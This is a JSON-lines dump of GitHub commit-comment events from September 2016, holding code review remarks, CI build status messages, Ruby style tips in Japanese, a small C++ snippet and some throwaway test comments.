{"id":"4506184865","type":"CommitCommentEvent","actor":{"login":"Nymbayr"},"repo":{"name":"Nymbayr/Hello-Word"},"payload":{"comment":{"id":18873887,"position":null,"line":null,"path":null,"commit_id":"5d1e5bc9cae35c9b2bf8efc89abd1aedd8a0345d","created_at":"2016-09-02T02:06:43Z","updated_at":"2016-09-02T02:06:43Z","body":"And mention moon tacos"}},"created_at":"2016-09-02T02:06:43Z"}
{"id":"4506185114","type":"CommitCommentEvent","actor":{"login":"kylebmetrum"},"repo":{"name":"metrumresearchgroup/mrgsolve"},"payload":{"comment":{"id":18873890,"position":5,"line":68,"path":"rdev/R/annot.R","commit_id":"69407eb9daa17e86a36be106daa99b7a00cc40dc","created_at":"2016-09-02T02:06:49Z","updated_at":"2016-09-02T02:06:49Z","body":"Function to extract model details"}},"created_at":"2016-09-02T02:06:49Z"}
{"id":"4506186913","type":"CommitCommentEvent","actor":{"login":"LuisdelaVega"},"repo":{"name":"LuisdelaVega/statsapp"},"payload":{"comment":{"id":18873913,"position":null,"line":null,"path":null,"commit_id":"aa390801f6a7b9f123a6a2c3da63f0c4ee150668","created_at":"2016-09-02T02:07:33Z","updated_at":"2016-09-02T02:07:33Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;Olo9eOf6&#x2F;5-set-up-dev-environment\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Set up dev environment</a>"}},"created_at":"2016-09-02T02:07:33Z"}
{"id":"4506187680","type":"CommitCommentEvent","actor":{"login":"billho"},"repo":{"name":"b3log/symphony"},"payload":{"comment":{"id":18873915,"position":null,"line":null,"path":null,"commit_id":"a9becefc4ab12c3a90f720f21d4bb182036cae3f","created_at":"2016-09-02T02:07:51Z","updated_at":"2016-09-02T02:07:51Z","body":"Got it ^_^"}},"created_at":"2016-09-02T02:07:51Z"}
{"id":"4506188735","type":"CommitCommentEvent","actor":{"login":"kylebmetrum"},"repo":{"name":"metrumresearchgroup/mrgsolve"},"payload":{"comment":{"id":18873943,"position":4,"line":204,"path":"rdev/R/mread.R","commit_id":"69407eb9daa17e86a36be106daa99b7a00cc40dc","created_at":"2016-09-02T02:08:16Z","updated_at":"2016-09-02T02:08:16Z","body":"After model is parsed, we put the data into this environment; user can extract and do as he/she pleases.  But once the R session restarts, it's gone."}},"created_at":"2016-09-02T02:08:16Z"}
{"id":"4506189989","type":"CommitCommentEvent","actor":{"login":"widd"},"repo":{"name":"B00mX0r/kitsune"},"payload":{"comment":{"id":18873956,"position":5,"line":10,"path":"Kitsune/ClubPenguin/Hashing.php","commit_id":"d81cd39d541c4b309a3e91d4317679c5709f5bfb","created_at":"2016-09-02T02:08:48Z","updated_at":"2016-09-02T02:08:48Z","body":"Why not just use a ternary operator and assign the function to a variable?"}},"created_at":"2016-09-02T02:08:48Z"}
{"id":"4506197439","type":"CommitCommentEvent","actor":{"login":"annProg"},"repo":{"name":"annProg/url_monitor"},"payload":{"comment":{"id":18874198,"position":null,"line":null,"path":null,"commit_id":"a6188ed3f8116315257d87f906b3d6a99a49fc2a","created_at":"2016-09-02T02:11:36Z","updated_at":"2016-09-02T02:11:36Z","body":"fix #1 "}},"created_at":"2016-09-02T02:11:36Z"}
{"id":"4506198035","type":"CommitCommentEvent","actor":{"login":"gvanrossum"},"repo":{"name":"phouse512/peps"},"payload":{"comment":{"id":18874224,"position":null,"line":null,"path":null,"commit_id":"e3560bb3e7b77b774f4befe2debbc41546d3b04f","created_at":"2016-09-02T02:11:52Z","updated_at":"2016-09-02T02:11:52Z","body":"> BTW I made some changes to the master peps repo.\r\n\r\nCopied.\r\n\r\n> several places where we talk about class annotations and instance annotations\r\n\r\nCan one of you do an editing pass for this?\r\n"}},"created_at":"2016-09-02T02:11:52Z"}
{"id":"4506199594","type":"CommitCommentEvent","actor":{"login":"annProg"},"repo":{"name":"annProg/url_monitor"},"payload":{"comment":{"id":18874274,"position":null,"line":null,"path":null,"commit_id":"4b7d7a3b0986617e2c0611a6c4e3f5ea05260a16","created_at":"2016-09-02T02:12:27Z","updated_at":"2016-09-02T02:12:27Z","body":"fix #1 "}},"created_at":"2016-09-02T02:12:27Z"}
{"id":"4506199604","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874275,"position":null,"line":null,"path":null,"commit_id":"834cc4d573b82acd4521eb54b251ade93916f55a","created_at":"2016-09-02T02:12:27Z","updated_at":"2016-09-02T02:12:27Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 1](http://teamcity.otenv.com/viewLog.html?buildId=5155052&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T02:12:27Z"}
{"id":"4506199812","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874284,"position":null,"line":null,"path":null,"commit_id":"834cc4d573b82acd4521eb54b251ade93916f55a","created_at":"2016-09-02T02:12:31Z","updated_at":"2016-09-02T02:12:31Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 1](http://teamcity.otenv.com/viewLog.html?buildId=5155052&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **FAILURE**\nSummary: Exit code 2 (new) Build time: 00:00:04"}},"created_at":"2016-09-02T02:12:31Z"}
{"id":"4506202946","type":"CommitCommentEvent","actor":{"login":"FelicityRainy"},"repo":{"name":"FelicityRainy/blog"},"payload":{"comment":{"id":18874318,"position":1,"line":1,"path":"test.html","commit_id":"20cf748fdaa75f23160066ba7c3c13be233ed4b1","created_at":"2016-09-02T02:13:44Z","updated_at":"2016-09-02T02:13:44Z","body":"<body>\r\n<div class=\"main\">\r\n<div class=\"left\">\r\n</div>\r\n</div>"}},"created_at":"2016-09-02T02:13:44Z"}
{"id":"4506204694","type":"CommitCommentEvent","actor":{"login":"linas"},"repo":{"name":"opencog/link-grammar"},"payload":{"comment":{"id":18874330,"position":4,"line":265,"path":"bindings/python/linkgrammar.py","commit_id":"8d779a5f0a1f897e8e61ed9f4dbb4806d1577ca7","created_at":"2016-09-02T02:14:28Z","updated_at":"2016-09-02T02:14:28Z","body":"OK. (Am I supposed to say something intelligent, here?)"}},"created_at":"2016-09-02T02:14:28Z"}
{"id":"4506210097","type":"CommitCommentEvent","actor":{"login":"autumnstar"},"repo":{"name":"autumnstar/Help"},"payload":{"comment":{"id":18874337,"position":17,"line":17,"path":"danger.cpp","commit_id":"94f0b96374f5a32d66c6c51f7542e51afa841b1b","created_at":"2016-09-02T02:16:34Z","updated_at":"2016-09-02T02:16:34Z","body":"hello"}},"created_at":"2016-09-02T02:16:34Z"}
{"id":"4506210619","type":"CommitCommentEvent","actor":{"login":"autumnstar"},"repo":{"name":"autumnstar/Help"},"payload":{"comment":{"id":18874339,"position":17,"line":17,"path":"danger.cpp","commit_id":"94f0b96374f5a32d66c6c51f7542e51afa841b1b","created_at":"2016-09-02T02:16:44Z","updated_at":"2016-09-02T02:16:44Z","body":"i was here\r\n"}},"created_at":"2016-09-02T02:16:44Z"}
{"id":"4506216259","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18874350,"position":null,"line":null,"path":null,"commit_id":"24b045af22fdced9bc2b3b5dcb3678af8dc688c9","created_at":"2016-09-02T02:18:54Z","updated_at":"2016-09-02T02:18:54Z","body":"develop (macumber) - Win64-Windows-7-VisualStudio-12: OK (2412 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-98.53%25-yellow.svg)</a> \n"}},"created_at":"2016-09-02T02:18:54Z"}
{"id":"4506222233","type":"CommitCommentEvent","actor":{"login":"ronniebermejo"},"repo":{"name":"michewede/Portfolio"},"payload":{"comment":{"id":18874357,"position":104,"line":104,"path":"index.html","commit_id":"ec99b28dd41638f7d1e7b11872d11cc10ad754b2","created_at":"2016-09-02T02:21:18Z","updated_at":"2016-09-02T02:21:18Z","body":"https://robots.thoughtbot.com/no-newline-at-end-of-file\r\n"}},"created_at":"2016-09-02T02:21:18Z"}
{"id":"4506222339","type":"CommitCommentEvent","actor":{"login":"FelicityRainy"},"repo":{"name":"FelicityRainy/blog"},"payload":{"comment":{"id":18874359,"position":1,"line":1,"path":"test.html","commit_id":"20cf748fdaa75f23160066ba7c3c13be233ed4b1","created_at":"2016-09-02T02:21:20Z","updated_at":"2016-09-02T02:21:20Z","body":"dishiidhaidhia"}},"created_at":"2016-09-02T02:21:20Z"}
{"id":"4506222381","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18874360,"position":null,"line":null,"path":null,"commit_id":"24b045af22fdced9bc2b3b5dcb3678af8dc688c9","created_at":"2016-09-02T02:21:22Z","updated_at":"2016-09-02T02:21:22Z","body":"iteration (macumber) - i386-Windows-7-VisualStudio-12: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-24b045af22fdced9bc2b3b5dcb3678af8dc688c9-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-02T02:21:22Z"}
{"id":"4506222553","type":"CommitCommentEvent","actor":{"login":"FelicityRainy"},"repo":{"name":"FelicityRainy/blog"},"payload":{"comment":{"id":18874361,"position":null,"line":null,"path":null,"commit_id":"20cf748fdaa75f23160066ba7c3c13be233ed4b1","created_at":"2016-09-02T02:21:26Z","updated_at":"2016-09-02T02:21:26Z","body":"dsadasdasdas"}},"created_at":"2016-09-02T02:21:26Z"}
{"id":"4506224139","type":"CommitCommentEvent","actor":{"login":"csnover"},"repo":{"name":"scummvm/scummvm"},"payload":{"comment":{"id":18874365,"position":11,"line":767,"path":"backends/graphics/opengl/opengl-graphics.cpp","commit_id":"2a15b8b280af4d4beddb142e468f511a65552e2d","created_at":"2016-09-02T02:22:04Z","updated_at":"2016-09-02T02:22:04Z","body":"dst is unused in this function"}},"created_at":"2016-09-02T02:22:04Z"}
{"id":"4506224885","type":"CommitCommentEvent","actor":{"login":"shogo-mitomo"},"repo":{"name":"keigori/marubatugame"},"payload":{"comment":{"id":18874366,"position":5,"line":5,"path":"Check_out.rb","commit_id":"72b67933d34afd805c05e9c7cd3a7d6431040841","created_at":"2016-09-02T02:22:22Z","updated_at":"2016-09-02T02:22:22Z","body":"@keigori グローバル変数はなるべく使いたくないですね。。。引数でもらうようにしましょう。"}},"created_at":"2016-09-02T02:22:22Z"}
{"id":"4506225359","type":"CommitCommentEvent","actor":{"login":"Rositani"},"repo":{"name":"Mieze/AtherosE2200Ethernet"},"payload":{"comment":{"id":18874369,"position":null,"line":null,"path":null,"commit_id":"abb10d2326762cb26d789079c4db1899e173fc2d","created_at":"2016-09-02T02:22:35Z","updated_at":"2016-09-02T02:22:35Z","body":"Meize\r\nCould you explain this when trying to install on 10.11.6\r\nAuthentication Errors:\r\n  Authentication Failures:\r\n  File owner/permissions are incorrect (must be root:wheel, nonwritable by group/other):\t/Library/Extensions/AtherosE2200Ethernet.kext, Contents, Info.plist, MacOS, AtherosE2200Ethernet, Resources, en.lproj, InfoPlist.strings"}},"created_at":"2016-09-02T02:22:35Z"}
{"id":"4506226106","type":"CommitCommentEvent","actor":{"login":"samirfor"},"repo":{"name":"Traum-Ferienwohnungen/docker-wkhtmltopdf"},"payload":{"comment":{"id":18874372,"position":null,"line":null,"path":null,"commit_id":"ca6fcae2e17c1409d0c43de03f84946a06eb4fb2","created_at":"2016-09-02T02:22:53Z","updated_at":"2016-09-02T02:22:53Z","body":"Nicely done. "}},"created_at":"2016-09-02T02:22:53Z"}
{"id":"4506227798","type":"CommitCommentEvent","actor":{"login":"xialeizhou"},"repo":{"name":"apache/zookeeper"},"payload":{"comment":{"id":18874373,"position":12,"line":1542,"path":"src/docs/src/documentation/content/xdocs/zookeeperAdmin.xml","commit_id":"c1b496442130b8b5c3795c7efcb9020de58dd698","created_at":"2016-09-02T02:23:34Z","updated_at":"2016-09-02T02:23:34Z","body":"cool"}},"created_at":"2016-09-02T02:23:34Z"}
{"id":"4506228175","type":"CommitCommentEvent","actor":{"login":"shogo-mitomo"},"repo":{"name":"keigori/marubatugame"},"payload":{"comment":{"id":18874375,"position":7,"line":7,"path":"Input.rb","commit_id":"72b67933d34afd805c05e9c7cd3a7d6431040841","created_at":"2016-09-02T02:23:44Z","updated_at":"2016-09-02T02:23:44Z","body":"@keigori 省略できる `return` は省略するのがRubyではスタンダードです。"}},"created_at":"2016-09-02T02:23:44Z"}
{"id":"4506228655","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874377,"position":null,"line":null,"path":null,"commit_id":"f425239489209f2df038c0167fa2985f336e62bb","created_at":"2016-09-02T02:23:56Z","updated_at":"2016-09-02T02:23:56Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 2](http://teamcity.otenv.com/viewLog.html?buildId=5155230&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T02:23:56Z"}
{"id":"4506228709","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874379,"position":null,"line":null,"path":null,"commit_id":"834cc4d573b82acd4521eb54b251ade93916f55a","created_at":"2016-09-02T02:23:58Z","updated_at":"2016-09-02T02:23:58Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 3](http://teamcity.otenv.com/viewLog.html?buildId=5155231&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T02:23:58Z"}
{"id":"4506228801","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874381,"position":null,"line":null,"path":null,"commit_id":"f425239489209f2df038c0167fa2985f336e62bb","created_at":"2016-09-02T02:24:00Z","updated_at":"2016-09-02T02:24:00Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 2](http://teamcity.otenv.com/viewLog.html?buildId=5155230&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **FAILURE**\nSummary: Exit code 2 (new) Build time: 00:00:04"}},"created_at":"2016-09-02T02:24:00Z"}
{"id":"4506230084","type":"CommitCommentEvent","actor":{"login":"wzhengui"},"repo":{"name":"wzhengui/Hello-world"},"payload":{"comment":{"id":18874384,"position":null,"line":null,"path":null,"commit_id":"83195851e04a1435d8f1bed2f8f83bb4694681bf","created_at":"2016-09-02T02:24:28Z","updated_at":"2016-09-02T02:24:28Z","body":"This is an additional info "}},"created_at":"2016-09-02T02:24:28Z"}
{"id":"4506231504","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874386,"position":null,"line":null,"path":null,"commit_id":"834cc4d573b82acd4521eb54b251ade93916f55a","created_at":"2016-09-02T02:25:02Z","updated_at":"2016-09-02T02:25:02Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 3](http://teamcity.otenv.com/viewLog.html?buildId=5155231&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **FAILURE**\nSummary: Exit code 2 Build time: 00:01:03"}},"created_at":"2016-09-02T02:25:02Z"}
{"id":"4506234015","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874391,"position":null,"line":null,"path":null,"commit_id":"834cc4d573b82acd4521eb54b251ade93916f55a","created_at":"2016-09-02T02:26:03Z","updated_at":"2016-09-02T02:26:03Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 4](http://teamcity.otenv.com/viewLog.html?buildId=5155237&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) is now running\n"}},"created_at":"2016-09-02T02:26:03Z"}
{"id":"4506234049","type":"CommitCommentEvent","actor":{"login":"shogo-mitomo"},"repo":{"name":"keigori/marubatugame"},"payload":{"comment":{"id":18874392,"position":3,"line":3,"path":"Judge_error.rb","commit_id":"72b67933d34afd805c05e9c7cd3a7d6431040841","created_at":"2016-09-02T02:26:04Z","updated_at":"2016-09-02T02:26:04Z","body":"@keigori \r\nRubyではクラス名にはキャメルケース（`JudgeError`）を使いましょう。またファイル名はスネークケース（`judge_error`）にしましょう。\r\nhttp://qiita.com/takahashim/items/ccfd489c9b26f15b7193"}},"created_at":"2016-09-02T02:26:04Z"}
{"id":"4506235033","type":"CommitCommentEvent","actor":{"login":"milose"},"repo":{"name":"milose/node-ctags"},"payload":{"comment":{"id":18874396,"position":null,"line":null,"path":null,"commit_id":"f367f864bf99a83a7146168bf5fe9e4adc268aeb","created_at":"2016-09-02T02:26:26Z","updated_at":"2016-09-02T02:26:26Z","body":"Fixes [this](https://github.com/yongkangchen/atom-ctags/issues/145)"}},"created_at":"2016-09-02T02:26:26Z"}
{"id":"4506235330","type":"CommitCommentEvent","actor":{"login":"wemrysi"},"repo":{"name":"quasar-analytics/quasar"},"payload":{"comment":{"id":18874399,"position":5,"line":60,"path":"marklogic/src/main/scala/quasar/physical/marklogic/ejson/AsXQuery.scala","commit_id":"8039f5c9c022c7ccc190300eabe05b51d978c1b8","created_at":"2016-09-02T02:26:33Z","updated_at":"2016-09-02T02:26:33Z","body":"There is syntax intended for literals like `42.xqy` that works for any `N: Integral`, but it uses `toLong`, so I didn't want to use with with `BigInt` (though, I think `Long` is the limit of what MarkLogic will accept, or at least something close to it)."}},"created_at":"2016-09-02T02:26:33Z"}
{"id":"4506236051","type":"CommitCommentEvent","actor":{"login":"TimLanglois"},"repo":{"name":"ToddBond/HabitatAnnotation"},"payload":{"comment":{"id":18874407,"position":null,"line":null,"path":null,"commit_id":"fc57876681828de99a83427719e92b3347634428","created_at":"2016-09-02T02:26:50Z","updated_at":"2016-09-02T02:26:50Z","body":"Edits by ToddBond"}},"created_at":"2016-09-02T02:26:50Z"}
{"id":"4506236742","type":"CommitCommentEvent","actor":{"login":"guestcenter-devops"},"repo":{"name":"opentable/gc-microsite-restaurant-search"},"payload":{"comment":{"id":18874409,"position":null,"line":null,"path":null,"commit_id":"834cc4d573b82acd4521eb54b251ade93916f55a","created_at":"2016-09-02T02:27:06Z","updated_at":"2016-09-02T02:27:06Z","body":"TeamCity Umami :: WebClient :: Sites :: Micro Sites :: GC Microsite - Restaurant Search :: Pull Request Test [Build 4](http://teamcity.otenv.com/viewLog.html?buildId=5155237&buildTypeId=Umami_WebClient_MicroSites_GcMicrositeRestaurantSearch_PullRequestTest) outcome was **FAILURE**\nSummary: Exit code 2 Build time: 00:01:04"}},"created_at":"2016-09-02T02:27:06Z"}
{"id":"4506236810","type":"CommitCommentEvent","actor":{"login":"lifehacking"},"repo":{"name":"ireaderlab/zkdash"},"payload":{"comment":{"id":18874410,"position":null,"line":null,"path":null,"commit_id":"929285691f0116fd277068484a713dc3764c0c78","created_at":"2016-09-02T02:27:08Z","updated_at":"2016-09-02T02:27:08Z","body":"有登录认证就好了"}},"created_at":"2016-09-02T02:27:08Z"}
{"id":"4506239305","type":"CommitCommentEvent","actor":{"login":"shogo-mitomo"},"repo":{"name":"keigori/marubatugame"},"payload":{"comment":{"id":18874413,"position":13,"line":13,"path":"Judge_error.rb","commit_id":"72b67933d34afd805c05e9c7cd3a7d6431040841","created_at":"2016-09-02T02:28:10Z","updated_at":"2016-09-02T02:28:10Z","body":"@keigori ある変数の値に応じて処理を分ける時は `case` を使うのが良いです。↓の方が「sの値に応じて処理を分岐してるんだな」というのが読む人にとって分かりやすいですよね。\r\n```\r\ncase s\r\nwhen 1\r\n  puts 'foo'\r\nwhen 2\r\n  puts 'bar'\r\nend\r\n```"}},"created_at":"2016-09-02T02:28:10Z"}
{"id":"4506244092","type":"CommitCommentEvent","actor":{"login":"shogo-mitomo"},"repo":{"name":"keigori/marubatugame"},"payload":{"comment":{"id":18874419,"position":24,"line":24,"path":"Judge_win.rb","commit_id":"72b67933d34afd805c05e9c7cd3a7d6431040841","created_at":"2016-09-02T02:30:01Z","updated_at":"2016-09-02T02:30:01Z","body":"@keigori `if` 文の `then` は省略可能です。"}},"created_at":"2016-09-02T02:30:01Z"}
{"id":"4506250044","type":"CommitCommentEvent","actor":{"login":"shogo-mitomo"},"repo":{"name":"keigori/marubatugame"},"payload":{"comment":{"id":18874427,"position":5,"line":5,"path":"Output.rb","commit_id":"72b67933d34afd805c05e9c7cd3a7d6431040841","created_at":"2016-09-02T02:32:15Z","updated_at":"2016-09-02T02:32:15Z","body":"@keigori \r\n↓こう書いたほうがRubyっぽいですね。Rubyで `for` 文はあまり使われません。\r\n```ruby\r\n2.times do |i|\r\n  print 'foo'\r\nend\r\n```"}},"created_at":"2016-09-02T02:32:15Z"}
{"id":"4506254457","type":"CommitCommentEvent","actor":{"login":"shogo-mitomo"},"repo":{"name":"keigori/marubatugame"},"payload":{"comment":{"id":18874435,"position":13,"line":13,"path":"main.rb","commit_id":"72b67933d34afd805c05e9c7cd3a7d6431040841","created_at":"2016-09-02T02:33:56Z","updated_at":"2016-09-02T02:33:56Z","body":"@keigori \r\n不要になったコードはコメントアウトではなく削除してしまいましょう。\r\nコメントアウトされていると読む人を「削除せずに残しているということはなにか意味があるのか…？」と悩ませてしまいます。"}},"created_at":"2016-09-02T02:33:56Z"}
{"id":"4506260788","type":"CommitCommentEvent","actor":{"login":"Feckl"},"repo":{"name":"Feckl/First-item"},"payload":{"comment":{"id":18874445,"position":null,"line":null,"path":null,"commit_id":"64c5fd0ce07bb9933201aba1fb090465bd1d5b11","created_at":"2016-09-02T02:36:17Z","updated_at":"2016-09-02T02:36:17Z","body":"multi layer tree structure."}},"created_at":"2016-09-02T02:36:17Z"}
{"id":"4506265357","type":"CommitCommentEvent","actor":{"login":"wjf123"},"repo":{"name":"wjf123/First"},"payload":{"comment":{"id":18874452,"position":3,"line":3,"path":"README.md","commit_id":"9b966ebaee1b18c6b2e9549310e34b29abb05aa4","created_at":"2016-09-02T02:38:07Z","updated_at":"2016-09-02T02:38:07Z","body":"fff"}},"created_at":"2016-09-02T02:38:07Z"}
{"id":"4506265748","type":"CommitCommentEvent","actor":{"login":"autumnstar"},"repo":{"name":"autumnstar/Help"},"payload":{"comment":{"id":18874454,"position":null,"line":null,"path":null,"commit_id":"601b451fd0c78cbe6db341caf8dfeaba5a106b53","created_at":"2016-09-02T02:38:15Z","updated_at":"2016-09-02T02:38:15Z","body":"hello"}},"created_at":"2016-09-02T02:38:15Z"}
{"id":"4506265952","type":"CommitCommentEvent","actor":{"login":"wjf123"},"repo":{"name":"wjf123/First"},"payload":{"comment":{"id":18874455,"position":3,"line":3,"path":"README.md","commit_id":"9b966ebaee1b18c6b2e9549310e34b29abb05aa4","created_at":"2016-09-02T02:38:19Z","updated_at":"2016-09-02T02:38:19Z","body":"gg"}},"created_at":"2016-09-02T02:38:19Z"}
{"id":"4506266001","type":"CommitCommentEvent","actor":{"login":"autumnstar"},"repo":{"name":"autumnstar/Help"},"payload":{"comment":{"id":18874456,"position":null,"line":null,"path":null,"commit_id":"601b451fd0c78cbe6db341caf8dfeaba5a106b53","created_at":"2016-09-02T02:38:21Z","updated_at":"2016-09-02T02:38:21Z","body":"goodbye"}},"created_at":"2016-09-02T02:38:21Z"}
{"id":"4506266521","type":"CommitCommentEvent","actor":{"login":"autumnstar"},"repo":{"name":"autumnstar/Help"},"payload":{"comment":{"id":18874460,"position":5,"line":7,"path":"Autumn Help Me","commit_id":"601b451fd0c78cbe6db341caf8dfeaba5a106b53","created_at":"2016-09-02T02:38:33Z","updated_at":"2016-09-02T02:38:33Z","body":"no"}},"created_at":"2016-09-02T02:38:33Z"}
{"id":"4506267749","type":"CommitCommentEvent","actor":{"login":"marcejohnson"},"repo":{"name":"marcejohnson/react-native-camera"},"payload":{"comment":{"id":18874464,"position":null,"line":null,"path":null,"commit_id":"0c82deede3f669782226756e560c61d21862899d","created_at":"2016-09-02T02:39:03Z","updated_at":"2016-09-02T02:39:03Z","body":"Android video flipped rotated #388\r\n"}},"created_at":"2016-09-02T02:39:03Z"}
{"id":"4506268422","type":"CommitCommentEvent","actor":{"login":"Deepraj"},"repo":{"name":"Deepraj/cmis-client-wrapper"},"payload":{"comment":{"id":18874465,"position":6,"line":18,"path":"src/main/java/com/mps/cmis/client/wrapper/Connector.java","commit_id":"3d559e64b8202d4eb3670659fec0d6998e8d2771","created_at":"2016-09-02T02:39:18Z","updated_at":"2016-09-02T02:39:18Z","body":"These two variables(folderPath,fileName ) can't be class level (static & non-static) variable as they can't be shared between threads . \r\n\r\nPlease make them local variable defined inside the method, as they were earlier."}},"created_at":"2016-09-02T02:39:18Z"}
{"id":"4506270745","type":"CommitCommentEvent","actor":{"login":"AbeOmor"},"repo":{"name":"sarmadhashmi/Coursity"},"payload":{"comment":{"id":18874470,"position":null,"line":null,"path":null,"commit_id":"1bedfb34105edb5c3e180ffc4188e7c9388aaeed","created_at":"2016-09-02T02:40:11Z","updated_at":"2016-09-02T02:40:11Z","body":"Fixed #22"}},"created_at":"2016-09-02T02:40:11Z"}
{"id":"4506279526","type":"CommitCommentEvent","actor":{"login":"adanilo"},"repo":{"name":"w3c/html"},"payload":{"comment":{"id":18874482,"position":null,"line":null,"path":null,"commit_id":"f2e47c637f787169d881010591e0056f79e31c06","created_at":"2016-09-02T02:43:26Z","updated_at":"2016-09-02T02:43:26Z","body":"Yes indeed, thanks for catching."}},"created_at":"2016-09-02T02:43:26Z"}
{"id":"4506281505","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill"},"payload":{"comment":{"id":18874484,"position":37,"line":152,"path":"jaxrs/src/main/java/org/killbill/billing/jaxrs/resources/OverdueResource.java","commit_id":"63e6be7f07fc8e9e22cd374cf0d457a623177c4f","created_at":"2016-09-02T02:44:09Z","updated_at":"2016-09-02T02:44:09Z","body":"For sure... I have a TODO, did not feel like breaking build or release `api` just yet.\r\n"}},"created_at":"2016-09-02T02:44:09Z"}
{"id":"4506281569","type":"CommitCommentEvent","actor":{"login":"CodeBlueDS"},"repo":{"name":"marcelozeballos/URI"},"payload":{"comment":{"id":18874485,"position":null,"line":null,"path":null,"commit_id":"091d8ec5349394b6e8eb1f34ae2ff8e2b1b676a8","created_at":"2016-09-02T02:44:10Z","updated_at":"2016-09-02T02:44:10Z","body":"#include <bits/stdc++.h>\r\nusing namespace std;\r\nint main() {\r\n    int q,d,p;\r\n\twhile(cin>>q>>d>>p && q!=0)\r\n\t{\r\n\tint r=abs(p*d*q/(p-q));\r\n\tcout<<r<<(r>=2?\" paginas\":\" pagina\")<<endl;\r\n\t}\r\n    return 0;\r\n}"}},"created_at":"2016-09-02T02:44:10Z"}
{"id":"4506293161","type":"CommitCommentEvent","actor":{"login":"gemarcano"},"repo":{"name":"chaoskagami/corbenik"},"payload":{"comment":{"id":18874495,"position":null,"line":null,"path":null,"commit_id":"709a33d87f3a6597dca1942cfd93e672b3937b0e","created_at":"2016-09-02T02:48:41Z","updated_at":"2016-09-02T02:48:41Z","body":"And per @TuxSH's suggestion as well.  Although, you can yank it, but you probably need it after the loops are done to make sure the dcache cleans are actually fully written to disk."}},"created_at":"2016-09-02T02:48:41Z"}
{"id":"4506297323","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-adyen-plugin"},"payload":{"comment":{"id":18874504,"position":null,"line":null,"path":null,"commit_id":"d607e6801d445cf43a9a28cf499ef9c2416a8ffd","created_at":"2016-09-02T02:50:24Z","updated_at":"2016-09-02T02:50:24Z","body":"Is the raw error code the response from the processor, issuer?"}},"created_at":"2016-09-02T02:50:24Z"}
{"id":"4506297448","type":"CommitCommentEvent","actor":{"login":"sbrossie"},"repo":{"name":"killbill/killbill-adyen-plugin"},"payload":{"comment":{"id":18874505,"position":null,"line":null,"path":null,"commit_id":"d607e6801d445cf43a9a28cf499ef9c2416a8ffd","created_at":"2016-09-02T02:50:27Z","updated_at":"2016-09-02T02:50:27Z","body":"👍 "}},"created_at":"2016-09-02T02:50:27Z"}
